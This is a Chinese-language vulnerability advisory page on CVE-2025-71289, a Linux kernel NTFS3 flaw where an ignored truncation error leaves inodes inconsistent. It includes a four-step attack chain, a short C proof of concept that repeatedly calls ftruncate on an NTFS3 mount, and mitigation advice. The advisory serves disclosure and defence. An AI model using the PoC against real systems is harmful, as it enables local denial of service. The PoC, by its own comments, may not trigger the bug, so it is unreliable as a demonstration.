CVE-2025-71289 CVSS 5.5 中危

CVE-2025-71289 Linux内核NTFS3截断错误忽略漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2025-71289

漏洞类型

逻辑错误

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的fs/ntfs3文件系统驱动存在一个安全漏洞。在执行文件截断操作时，如果attr_set_size()函数调用失败，系统会忽略该错误返回值，导致inode可能处于不一致的状态。本地低权限攻击者可利用此漏洞造成拒绝服务。

技术细节

该漏洞位于Linux内核的fs/ntfs3模块中，具体原因是错误处理逻辑存在缺陷。当系统尝试截断文件（减小文件大小）时，会调用attr_set_size()来更新文件属性。在该函数执行过程中，如果遇到错误（例如磁盘空间不足或元数据更新失败），现有代码未能正确处理并传播该错误，而是继续执行。这导致文件系统的索引节点被部分修改，最终处于不一致的状态。攻击者可通过在挂载的NTFS3分区上执行特定的文件操作触发该逻辑漏洞，从而导致内核崩溃或文件系统损坏。

攻击链分析

STEP 1

步骤1

攻击者获得本地低权限访问权限，并能够访问挂载的NTFS3文件系统。

STEP 2

步骤2

攻击者在NTFS3分区上创建或操作特定文件，准备触发截断操作。

STEP 3

步骤3

攻击者调用截断文件大小的系统调用，导致attr_set_size()函数执行。

STEP 4

步骤4

利用内核错误处理缺陷，使inode处于不一致状态，触发系统崩溃或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2025-71289
 * This code demonstrates the logic issue where truncation errors
 * in the NTFS3 driver might be ignored.
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>

int main() {
    // Target file on an NTFS3 mounted filesystem
    const char *file_path = "/mnt/ntfs_share/vulnerable_file.dat";
    int fd;

    fd = open(file_path, O_RDWR | O_CREAT, 0644);
    if (fd < 0) {
        perror("[-] Failed to open file");
        return 1;
    }

    printf("[+] File opened. Attempting to trigger truncation bug...\n");

    // Repeatedly attempt to truncate the file to induce error conditions
    // Depending on the specific state of the FS, this may trigger the ignored error path.
    for (int i = 0; i < 10; i++) {
        if (ftruncate(fd, i * 1024) != 0) {
            perror("[-] Truncate failed");
        }
    }

    close(fd);
    printf("[+] Done. Check system logs for inconsistencies.\n");
    return 0;
}

影响范围

Linux Kernel (详情请参考Git提交记录)

防御指南

临时缓解措施

建议立即应用官方发布的内核补丁。在无法立即升级内核的情况下，可以通过限制用户对NTFS3分区的挂载和写入操作来降低风险，或者暂时禁用NTFS3驱动模块。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表